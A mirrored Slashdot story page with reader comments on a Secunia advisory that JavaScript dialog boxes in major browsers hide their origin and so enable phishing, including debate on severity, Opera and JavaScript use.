Slashdot Mirror

← Back to Stories (view on slashdot.org)

Major Browsers Have JS Pop-Up Flaw

Posted by Zonk on from the security-flaws-build-character dept.

An anonymous reader writes "Secunia is warning that several popular browsers contain a vulnerability that could allow a phishing attack. 'The problem is that JavaScript dialog boxes do not display or include their origin, which allows a new window to open -- for example, a prompt dialog box -- which appears to be from a trusted site,' Secunia said. The browsers include the latest versions of IE, IE for Mac, Safari, iCab, Mozilla, Mozilla Firefox and Camino. Opera 7 and 8 are also affected but not 8.01."

15 of 397 comments (clear)

  1. Lets see.... by wo1verin3 · · Score: 4, Interesting

    Opera 8.01 was released June 18th.... (only a few days ago)

    It is the only browser not affected....

    And now this leaked out where reports can only say that one browser does not suffer from this issue. //tin-foil hat engaged

    1. Re:Lets see.... by houseofzeus · · Score: 1, Interesting

      Well it's not exactly something getting fixed quickly by ANYONE, given that it is something that has existed since we first got JavaScript. It is also debatable whether it is a problem on the part of the browser or just users being to stupid. In most mail clients after you click yes to open an attachment you can still get a virus from the executable, is this a bug?

  2. It's not a flaw according to MS... by bc90021 · · Score: 5, Interesting

    ...and they're not going to release a patch for it.

    And you *know* that if Microsoft says it's not a flaw, well, then, it mustn't be a flaw. ;)

    --
    libertarianswag.com
  3. disable javascript multitasking by alexfromspace · · Score: 2, Interesting

    To solve this problem, javascript multitasking must be disabled, only letting the current active window or tab having keyboard focus to run its javascript. Other tabs' scripts must not be disabled, but instead paused until they in turn receive focus.

  4. Phishing it for all it's worth by null+etc. · · Score: 4, Interesting
    Isn't this just a rehash of every other bug they've announce this year, in a slightly different permutation? Next month, I expect they'll announce that frames within a DSHTML portion of a popup window can be loaded from non-trusted domains.

    It cracks me up, because they probably have an obsessive/compulsive, socially-maligned programmer within Secunia that just delights spending 16 hours a day trying to twist the browsers into doing what he wants. And then Secunia announces these flaws to save their reputation because nothing else is going on.

  5. Re:old news by Anonymous Coward · · Score: 5, Interesting

    It's not even a bug.

    It's advertising and FUD from those Opera guys. They are really getting boring.

    - Opera adds a feature that shows the name of the site in the title bar in their last build ;
    - Someone at Opera reports it (under a false name) as a security issue affecting every browser BUT Opera ;
    - Slashdot runs one more article about the genious of this stupid paid-for, closed source browser.

    That's not the first time it happens, nor the last one. /., stop supporting Opera FUD. Thanks.

  6. Re:If someone is foolish enough to log in via pop- by ctr2sprt · · Score: 2, Interesting
    Hack a commercial website. Find an interesting page, then replace it with your own. The replacement page includes JavaScript to (a) display the "login" popup; and (b) redirect to the real page. Information from the login popup is redirected to a collection or harvesting site and perhaps even forwarded back to the legitimate site (so you don't have to login twice, which would make some people suspicious).

    You really think most people end up on malicious sites intentionally?

  7. Re:stop developing with JavaScript by AKAImBatman · · Score: 5, Interesting

    People should stop developing with JavaScript. It's nothing but trouble.

    Poppycock. This is nothing more than a typical knee-jerk reaction to a minor security flaw. Should we all stop using email because phisers can craft ones that look like someone elses?

    Lots of sites use JavaScript very effectively. So many in fact, that it's rather difficult to make such a wild statement as "JAvascript is nothing but trouble." Google is a perfect example of a highly useful site with JS. For example, Maps and GMail both rely heavily on JS. In fact, most webmail sites contain JS. And without JS, you couldn't have neat stuff like this. (Login is test, test)

    --
    Javascript + Nintendo DSi = DSiCade
  8. Re:Safari by callipygian-showsyst · · Score: 2, Interesting

    Have you ever used Objective-C? It's the SLOWEST compiled environment ever! And, because there's no garbage collection, etc, it's certainly no more secure than "raw" C (because all of C is legal in Objective-C). In many cases, Objective C is slower than Java becasue of it's "run-time" binding.

    --
    Best Buy can have you arrested
  9. Not on Mac Firefox by Anonymous Coward · · Score: 1, Interesting

    Actually, this attack doensn't work "well" with Firefox on Mac, which uses sheets to display JavaScript dialog (alert, promt, confirm). By tying the dialog to the window, it becomes visually obvious which window the pop-up belongs to.

    Now why doesn't Safari use this? Seems strange Apple wouldn't use their own UI convention.

  10. Odd by Sheepdot · · Score: 3, Interesting

    If Secunia is reporting it, why not link directly to Secunia?

    http://secunia.com/multiple_browsers_dialog_origin _vulnerability_test

    I've never understood the reason to link to ZDnet first. Especially when we are all a technical crowd and can deduce the severity on our own.

    In my own opinion, the security community has been really scrambling to find exploits and vulnerabilities since the release of Windows XP SP2, which, despite a lot of compatibility issues with common software, has been very effective in slowing down the growth of zombie networks. In short, Microsoft finally got something right, and those that are in IT security for the sole reason of bashing MS to make a buck, are having a hard time doing so.

    This is a phising technique that can be used to get a username/password from like a credit card or bank website, but that's about it. You'd be hard pressed to get this to compromise a local machine, although I'm interested in what would happen if someone tried calling a local zone page (like a help file) and then executing the javascript from that page. There was a similar exploit that used this delayed tactic last year that Microsoft didn't fix for probably 3 months. It was a 0-day exploit too, it was found in the wild, spreading via IRC, before anyone reported the vulnerability.

  11. Re:stop developing with JavaScript by DogDude · · Score: 2, Interesting

    How many of us have it disabled in our browsers?

    Only the most paranoid of geeks, buddy. Average Joe has no idea what Javascript is. Hell, I was and currently am a part time web developer, and I'm not afraid of Javascript.

    --
    I don't respond to AC's.
  12. Re:Safari by arkanes · · Score: 4, Interesting
    a) There *is* garbage collection in ObjC (via refcounting), and GC has little to nothing to do with the relative security of C and Java (theres some obscure security flaws related to misuse of buggy versions of malloc(), on the other hand there's obscure flaws related to abusing the GC scheme to bypass Javas typesafety. And neither are common or practical.)

    b) You can certainly use unsafe C contructs in ObjC, but ObjC provides (and encourages) safe, non-C constructs that address the vast majority of C problems. Unsafe pointer and buffer operations are rare in ObjC, because the language provides better alternatives.
    c) "Many cases slower than Java" is the sort of unsupportable bullshit that people make when they're trolling. Yes, message passing is slower than virtual function calls (and Javas are [much,much] slower than C++s vcalls).

  13. Connect the Dots by Doc+Ruby · · Score: 3, Interesting

    I want a window manager that draws lines between parent/child windows, parent/child processes. While we're at it, how about one that lets me click one window, then drag all the windows in the group as one, maintaining relative position? Yeah, I want to drag windows around, and save their positions with the window manager, then open that state with a single click on a desktop menu. While we're at it, I want the groups to include arbitrary windows from multiple apps. So I can open a "workplace", and immediately begin working in a familiar environment. If this works, how about letting me drag a line from any window to another, piping STDIN/OUT/ERR between processes? If I can minimize the windows into icons, my window manager is now a visual programming environment. Which, to come full circle, could let me as a user tell by looking which info is tainted by which untrusted windows and datapaths, including innocent-looking JS popup windows.

    --

    --
    make install -not war

  14. Solution to the problem by SSHGuru · · Score: 1, Interesting

    If you have a visual rather than a list as a search engine then it can stop all Java Pop-Up activity. It can stop anything because it scans each page. Try it out. It's on download.com free. http://www.download.com/ViewFour-com-ViewSmart/300 0-8022_4-10406154.html?tag=lst-0-18 Here is a description... ViewSmart by ViewFour.com is Web-based software that visually displays search results found in Google, MSN, eBay, and other search/e-commerce engines in a multi window environment (2-50). By visually displaying results you get to see your searches rather than having to click back and forth through them. This slick new method of searching the Web also removes the potential dangers of surfing the NET. The software scans each Web page prior to displaying it and stops all hidden and or malicious files from being automatically downloaded without your knowledge. If a page fails the scan, a large red border and stop sign will appear around the window. This means you are protected from contracting viruses, adware, spyware, and other forms of malware while surfing the Web. Version 2.94 improves malware scanning engine.